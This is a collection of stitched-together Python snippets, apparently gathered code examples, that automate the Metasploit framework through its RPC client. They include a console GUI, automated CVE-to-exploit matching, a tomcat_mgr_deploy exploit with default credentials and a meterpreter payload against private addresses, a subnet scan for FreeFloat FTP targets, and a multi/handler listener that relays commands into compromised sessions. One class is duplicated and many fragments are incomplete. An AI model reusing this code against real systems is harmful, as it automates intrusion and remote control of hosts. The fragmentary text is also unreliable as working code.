class MsfShellWindow(QMainWindow, Ui_MainWindow):
def __init__(self, msfrpc, **kwargs):
QMainWindow.__init__(self, kwargs.pop('parent', None))
self.setupUi(self)
self.setWindowTitle('Metasploit Console')
self._initCommandLine()
self._msfInit(msfrpc, **kwargs)
def _msfInit(self, msfrpc, **kwargs):
self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'),
self._getOutput)
self.prompt = 'msf >'
self.c = MsfRpcConsole(msfrpc,
sessionid=kwargs.get('sessionid'),
cb=self._emitSignal)
if 'command' in kwargs:
self.commanderLineEdit.setText(kwargs['command'])
self.commanderLineEdit.emit(SIGNAL('returnPressed()'))
def _emitSignal(self, d):
self.outputTextBrowser.emit(SIGNAL('textChanged(QString)'), repr(d))
def _initCommandLine(self):
self.connect(self.commanderLineEdit, SIGNAL('returnPressed()'),
self._sendCommand)
self.vb = self.outputTextBrowser.verticalScrollBar()
def _sendCommand(self):
c = self.outputTextBrowser.textCursor()
c.movePosition(QTextCursor.End)
self.outputTextBrowser.setTextCursor(c)
cmd = str(self.commanderLineEdit.text())
if cmd == 'exit':
self.close()
return
self.c.execute(cmd)
self.outputTextBrowser.insertHtml('%s<br>' % cmd)
self.commanderLineEdit.clear()
self.vb.setValue(self.vb.maximum())
def _getOutput(self, d):
d = eval(str(d))
self.prompt = d['prompt']
self.outputTextBrowser.insertPlainText('\n%s\n' % d['data'])
self.outputTextBrowser.insertHtml(
'<font color="red"><b>%s</b></font><font color="black"> </font>'
% self.prompt)
self.vb.setValue(self.vb.maximum())
def closeEvent(self, event):
self.c.__del__()
QMainWindow.close(self)
class MsfShellWindow(QMainWindow, Ui_MainWindow):
def __init__(self, msfrpc, **kwargs):
QMainWindow.__init__(self, kwargs.pop('parent', None))
self.setupUi(self)
self.setWindowTitle('Metasploit Console')
self._initCommandLine()
self._msfInit(msfrpc, **kwargs)
def _msfInit(self, msfrpc, **kwargs):
self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'), self._getOutput)
self.prompt = 'msf >'
self.c = MsfRpcConsole(msfrpc, sessionid=kwargs.get('sessionid'),cb=self._emitSignal)
if 'command' in kwargs:
self.commanderLineEdit.setText(kwargs['command'])
self.commanderLineEdit.emit(SIGNAL('returnPressed()'))
def _emitSignal(self, d):
self.outputTextBrowser.emit(SIGNAL('textChanged(QString)'), repr(d))
def _initCommandLine(self):
self.connect(self.commanderLineEdit, SIGNAL('returnPressed()'), self._sendCommand)
self.vb = self.outputTextBrowser.verticalScrollBar()
def _sendCommand(self):
c = self.outputTextBrowser.textCursor()
c.movePosition(QTextCursor.End)
self.outputTextBrowser.setTextCursor(c)
cmd = str(self.commanderLineEdit.text())
if cmd == 'exit':
self.close()
return
self.c.execute(cmd)
self.outputTextBrowser.insertHtml('%s<br>' % cmd)
self.commanderLineEdit.clear()
self.vb.setValue(self.vb.maximum())
def _getOutput(self, d):
d = eval(str(d))
self.prompt = d['prompt']
self.outputTextBrowser.insertPlainText('\n%s\n' % d['data'])
self.outputTextBrowser.insertHtml('<font color="red"><b>%s</b></font><font color="black"> </font>' % self.prompt)
self.vb.setValue(self.vb.maximum())
def closeEvent(self, event):
self.c.__del__()
QMainWindow.close(self)
client = MsfRpcClient("hocine")
console = MsfRpcConsole(client, cb=console_reader)
#utile.parcer_result_scannig("result_of_scannig.csv")
list_cve = []
list_host_exploit = []
list_temp = list()
hitgh_vul = open("high_vul.csv", "r")
lines = csv.reader(hitgh_vul)
for line in lines:
list_cve = line[1].split(',')
line[1] = ""
for cve in list_cve:
console.execute("search " + str(cve) + "")
time.sleep(5)
while status_of_console:
time.sleep(2)
list_temp.append(line[0])
list_temp.append(str(line_with_exploit).split()[2])
print list_temp
line_with_exploit = []
list_host_exploit.append(list_temp)
list_temp = []
print list_temp
hitgh_vul.close()
print list_host_exploit
for target in list_host_exploit:
from metasploit.msfrpc import MsfRpcClient
from metasploit.msfconsole import MsfRpcConsole
client = MsfRpcClient('123456', user='******')
print dir(console)
auxilary = client.modules.auxiliary
for i in auxilary:
print "\t%s" % i
scan = client.modules.use('auxiliary', 'scanner/ssh/ssh_version')
scan.description
scan.required
scan['VERBOSE'] = True
scan['RHOSTS'] = '192.168.1.119'
print scan.execute()
console = MsfRpcConsole(client)
console.execute('use scanner/ssh/ssh_version')
console.execute('set RHOSTS 192.168.1.119')
console.execute('set VERBOSE True')
console.execute('run')
exploits = client.modules.exploits
for exploit in exploits:
print("\t%s" % exploit)
scan = client.modules.use('exploits', 'multi/http/tomcat_mgr_deploy')
scan.description
scan.required
scan['RHOST'] = '192.168.100.2'
scan['RPORT'] = '8180'
scan['PATH'] = '/manager'
scan['HttpUsername'] = '******'
scan['HttpPassword'] = '******'
scan['payload'] = 'java/meterpreter/bind_tcp'
print(scan.execute())
console = MsfRpcConsole(client)
console.execute('use exploit/multi/http/tomcat_mgr_deploy')
console.execute('set RHOST 192.168.100.2')
console.execute('set RPORT 8180')
console.execute('set PATH /manager')
console.execute('set HttpUsername tomcat')
console.execute('set HttpPassword tomcat')
console.execute('set payload java/meterpreter/bind_tcp')
console.execute('run')
global global_console_status
global_console_status = console_data['busy']
if '[+]' in console_data['data']:
sigdata = console_data['data'].rstrip().split('\n')
for line in sigdata:
if '[+]' in line:
global_positive_out.append(line)
client = MsfRpcClient('password')
# cb - callback function, executes when data arrives to console
console = MsfRpcConsole(client, cb=read_console)
time.sleep(10)
console.execute('use auxiliary/scanner/ftp/ftp_version')
console.execute('set RHOSTS 192.168.0.0/24')
console.execute('set THREADS 20')
console.execute('run')
time.sleep(5)
while global_console_status:
print 'global_console_status: ' + str(global_console_status)
time.sleep(5)
time.sleep(5)
targets = list()
for line in global_positive_out:
if 'FreeFloat' in line:
ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}', line)[0]
targets.append(ip)
class MetasploitInteractor():
def __init__(self, password, rpcport, listenerport, payload):
self.interactorclient = MsfRpcClient(password, ssl=False, port=rpcport)
self.consolebuffer = []
self.listenerconsole = MsfRpcConsole(self.interactorclient,
cb=self.appendtoconsolebuffer)
self.listenerconsole.execute('use exploit/multi/handler')
self.listenerconsole.execute('set PAYLOAD ' + payload)
self.listenerconsole.execute('set LPORT ' + str(listenerport))
self.listenerconsole.execute('set LHOST 0.0.0.0')
self.listenerconsole.execute('set ExitOnSession false')
self.listenerconsole.execute('exploit -j')
self.currentsessionid = None
self.currentshell = None
def writetoconsole(self, data):
self.listenerconsole.execute(data)
def appendtoconsolebuffer(self, consoledata):
self.consolebuffer.append(consoledata)
def readconsole(self):
unread = self.consolebuffer
self.consolebuffer = []
return unread
def getsessions(self, verbose=False):
if verbose:
return self.interactorclient.sessions.list.items()
else:
return [[sessionid, sessionmeta['info'], sessionmeta['username']]
for sessionid, sessionmeta in
self.interactorclient.sessions.list.items()]
def sendcommandtosession(self, sessionid, command):
if sessionid != self.currentsessionid:
try:
self.currentshell = self.interactorclient.sessions.session(
sessionid)
except KeyError:
return "Error, session does not exist"
self.currentsessionid = sessionid
try:
self.currentshell.write(command)
resp = self.currentshell.read()
except (metasploit.msfrpc.MsfRpcError, httplib.CannotSendRequest):
return "Error, session died"
return resp
